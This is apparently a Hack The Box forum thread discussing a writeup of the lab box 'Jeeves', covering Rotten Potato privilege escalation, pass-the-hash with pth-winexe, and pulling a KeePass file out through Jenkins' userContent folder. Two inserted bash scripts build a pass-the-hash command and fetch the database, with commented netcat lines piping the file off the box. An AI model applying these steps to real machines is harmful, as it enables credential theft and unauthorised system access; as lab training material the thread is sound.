Jeeves Writeup by Largoat

Hi all,

I’m very new to all of this. I’ve had an interest in all things CyberSec ever since I was a kid (now in my mid 30s) but have never really followed that path for whatever reason. I joined HTB last week and I absolutely love it. I definitely need a change of career so while I work on getting my qualifications I’ve decided to create a blog where I’ll post writeups for the boxes that I do; starting with Jeeves.

Since this is my first ever writeup, I’d very much appreciate feedback on how it reads, how informative it is or isn’t and if my way of doing things could be improved.

Writeup is here: https://largoat.uk/jeeves

TL;DR: Click link

Nice work mate. I wanted to mention there is an intended way for priv esc on Jeeves (Rotten Potato) and it worked for me.

That’s something I’ve never heard of. I’m going to look it up and I may put a note on the writeup afterwards. Thank you

Hi Largoat,
I am a new user and trying to learn.
I have been following most of the write-ups. I followed all the instructions except, I couldn’t figure out your instruction on downloading the file “CEH.kdbx” to my local kali box.

Where you say, “There’s a couple of ways to do this. One is to use Netcat to set up a listener on the Jeeves box and then connect to it from your attacking machine, but the easiest way I found was to copy the file to the userContent folder inside the Jenkins directory (C:\Users\Administrator\.jenkins)”.

Where exactly is the ‘userContent’ folder? I copied the file to the C:\Users\Administrator\.jenkins folder, then I tried to access the file to download it, but it just couldn’t find this folder.

I went to http://10.10.10.63:50000/askjeeves/userContent/ but couldn’t find the copied file.

Please help me getting the file.

Also, you mentioned about an alternate way of initiating a listener on the remote Windows box, please provide some instructions/tips on that as well.

It would be a great learning experience for me please!

Thanks for the great work!

@B3nT3ch said:
Nice work mate. I wanted to mention there is an intended way for priv esc on Jeeves (Rotten Potato) and it worked for me.

Hey mate, would you mind posting the steps you took for priv esc using the Rotten Potato NTLM MitM attack please?

Great writeup, but for priv esc you can do it without Metasploit by using pth-win.exe once you have the hash, especially if you intend to do the OSCP, as I assume that is what you will be doing based on your initial message.

@jwardak said:

Hey mate, would you mind posting the steps you took for priv esc using the Rotten Potato NTLM MitM attack please?

Yes, of course. I had heard about an exploit called Potato for some time, so that led me to search on Google, where I found this detailed article on it:
Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM

After that I looked for a ready-made exe file, as I did not want to compile the program from its original repo, and that led me to this GitHub repo:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

I followed the steps and it worked.
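
B3nT3ch's Rotten Potato route and richeze's pass-the-hash suggestion earlier in the thread both come down to a quick check before you commit to a technique. The block below is an added example in bash and is not code from either poster or from the linked repo: the first function reads a pasted `whoami /priv` and tells you whether the account you landed as even holds the SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege that Rotten Potato relies on, and the second builds the Metasploit-free pass-the-hash command line, validating the hash and supplying the blank LM half when you only have the NT hash. Assumptions: `pth-winexe` from Kali's passing-the-hash package is what "pth-win.exe" refers to, the target address 10.10.10.63 is taken from the thread, and the `whoami /priv` text and the hash value are constructed samples, not values from the box.

```shell
#!/usr/bin/env bash
# Added example (not from this thread or the linked repo): pre-flight checks
# for the two priv-esc routes discussed, Rotten Potato and pass-the-hash.
set -eu

# Constructed sample of `whoami /priv` output as a service account might show it.
SAMPLE_WHOAMI_PRIV='PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled'

# Rotten Potato only works if SeImpersonatePrivilege (or
# SeAssignPrimaryTokenPrivilege) is in the token. $1 is the text of
# `whoami /priv` pasted from the target; returns 0 if either is listed.
# Windows lists privileges even when Disabled, so glance at the State column
# too: a Disabled privilege still has to be enabled by the exploiting process.
has_impersonate_priv() {
    printf '%s\n' "$1" | tr -d '\r' \
        | grep -Eq '^Se(Impersonate|AssignPrimaryToken)Privilege[[:space:]]'
}

# Build the pth-winexe command for the Metasploit-free route.
# $1 user, $2 hash (NT hash or LM:NT), $3 target (default from the thread).
# pth-winexe expects LM:NT, so a bare NT hash gets the empty-LM placeholder.
pth_winexe_cmd() {
    local user="$1" hash="$2" target="${3:-10.10.10.63}"
    if printf '%s' "$hash" | grep -Eq '^[0-9a-fA-F]{32}$'; then
        hash="aad3b435b51404eeaad3b435b51404ee:$hash"
    elif ! printf '%s' "$hash" | grep -Eq '^[0-9a-fA-F]{32}:[0-9a-fA-F]{32}$'; then
        echo "bad hash '$hash': expected 32 hex chars (NT) or LM:NT" >&2
        return 1
    fi
    printf "pth-winexe -U '%s%%%s' //%s cmd.exe\n" "$user" "$hash" "$target"
}

# On the box itself, once has_impersonate_priv says yes, run the Rotten Potato
# binary from the repo linked above per its README; it hands the impersonated
# SYSTEM token to whatever command you give it (details vary between builds).

# Usage: ./privesc_checks.sh demo   (guarded so sourcing the file runs nothing)
if [ "${1:-}" = "demo" ]; then
    if has_impersonate_priv "$SAMPLE_WHOAMI_PRIV"; then
        echo "SeImpersonatePrivilege present: Rotten Potato is worth trying"
    fi
    # Constructed placeholder hash, not a value from the box.
    pth_winexe_cmd Administrator 0123456789abcdef0123456789abcdef
fi
```

pth-winexe still needs SMB (445) reachable and the hashed account to be a local administrator on the box, since it installs a service over the admin share; if the hash belongs to anything less, the command will authenticate and then fail at service creation.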

@jwardak said:
Hi Largoat,
I am a new user and trying to learn.
I have been following most of the write-ups. I followed all the instructions except, I couldn’t figure out your instruction on downloading the file “CEH.kdbx” to my local kali box.

Where you say, “There’s a couple of ways to do this. One is to use Netcat to set up a listener on the Jeeves box and then connect to it from your attacking machine, but the easiest way I found was to copy the file to the userContent folder inside the Jenkins directory (C:\Users\Administrator\.jenkins)”.

Where exactly is the ‘userContent’ folder? I copied the file to the C:\Users\Administrator\.jenkins folder, then I tried to access the file to download it, but it just couldn’t find this folder.

I went to http://10.10.10.63:50000/askjeeves/userContent/ but couldn’t find the copied file.

Please help me getting the file.

Also, you mentioned about an alternate way of initiating a listener on the remote Windows box, please provide some instructions/tips on that as well.

It would be a great learning experience for me please!

Thanks for the great work!

Thanks for the kind words. I’m not at a machine right now to double check, but there should be a folder inside .jenkins called userContent. Any files placed in here will be served up on request; for example, copying CEH.kdbx into the userContent dir will make it accessible using the URL http://10.10.10.63:50000/askjeeves/userContent/CEH.kdbx.

I couldn’t get the netcat listener working; however, I’m also having the same issues with 2 other boxes, so I think there’s an issue on my system somewhere. I need to investigate this before I can write it up.

@richeze said:
Great writeup, but for priv esc you can do it without Metasploit by using pth-win.exe once you have the hash, especially if you intend to do the OSCP, as I assume that is what you will be doing based on your initial message.

I’m going to give this a go this week and will amend the writeup. Thanks for the advice!
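
Largoat's answer above covers the staging side; what follows is an added example in bash of the attacker-side half, and is not code from the writeup or from anyone in this thread. It fetches the file from the Jenkins userContent URL, makes curl fail on an HTTP error instead of quietly saving Jenkins' HTML error page under the .kdbx name, and then confirms the bytes really are a KeePass 2.x database by checking the 8-byte file signature before you spend time trying to open or crack it. The target address and URL prefix come from the thread; the source path of CEH.kdbx on the box and the nc.exe alternative in the comments are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not the writeup's code): pull CEH.kdbx out through Jenkins'
# userContent directory and check that what arrived is really a KeePass DB.
set -eu

TARGET="${TARGET:-10.10.10.63}"
JENKINS="http://$TARGET:50000/askjeeves"

# On the box (Jenkins script console or the shell you already have), stage the
# file under JENKINS_HOME\userContent; Jenkins serves that directory as-is.
# The source path is an assumption, use wherever you found CEH.kdbx:
#   copy "C:\path\to\CEH.kdbx" "C:\Users\Administrator\.jenkins\userContent\CEH.kdbx"
#
# Alternative if you have uploaded nc.exe (it is not on Windows by default):
#   box:      nc.exe -lvp 4444 < CEH.kdbx
#   attacker: nc $TARGET 4444 > CEH.kdbx

# KeePass 2.x databases start with the 8 bytes 03 D9 A2 9A 67 FB 4B B5
# (the two little-endian signature words 0x9AA2D903 and 0xB54BFB67).
# Returns 0 when $1 carries that signature, 1 otherwise.
kdbx_check() {
    local magic
    magic=$(head -c 8 "$1" | od -A n -t x1 | tr -d ' \n')
    [ "$magic" = "03d9a29a67fb4bb5" ]
}

# Download from userContent and refuse to keep anything that is not a kdbx.
# curl -f turns a 404 (file not staged, wrong folder) into a non-zero exit
# rather than silently writing Jenkins' HTML error page to $out.
fetch_kdbx() {
    local out="$1"
    curl -sSf -o "$out" "$JENKINS/userContent/CEH.kdbx"
    if ! kdbx_check "$out"; then
        echo "$out is not a KeePass 2.x database; check the staged path" >&2
        rm -f "$out"
        return 1
    fi
    # Record the hash so you can compare against the copy on the box later.
    sha256sum "$out"
}

# Usage: ./fetch_kdbx.sh fetch   (guarded so sourcing the file does not hit the network)
if [ "${1:-}" = "fetch" ]; then
    fetch_kdbx CEH.kdbx
fi
```

The signature check is the part worth keeping around: a Jenkins instance that cannot find the file answers with a 200-looking HTML page on some paths and a 404 on others, and keepass2john will happily reject the result with a less helpful message than this one.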

@B3nT3ch said:

Yes, of course. I had heard about an exploit called Potato for some time, so that led me to search on Google, where I found this detailed article on it:
Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM

After that I looked for a ready-made exe file, as I did not want to compile the program from its original repo, and that led me to this GitHub repo:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

I followed the steps and it worked.

Thank you very much mate!

@Largoat said:

Thanks for the kind words. I’m not at a machine right now to double check, but there should be a folder inside .jenkins called userContent. Any files placed in here will be served up on request; for example, copying CEH.kdbx into the userContent dir will make it accessible using the URL http://10.10.10.63:50000/askjeeves/userContent/CEH.kdbx.

I couldn’t get the netcat listener working; however, I’m also having the same issues with 2 other boxes, so I think there’s an issue on my system somewhere. I need to investigate this before I can write it up.

Thanks heaps!

@jwardak said:
Thank you very much mate!

You are welcome :slight_smile: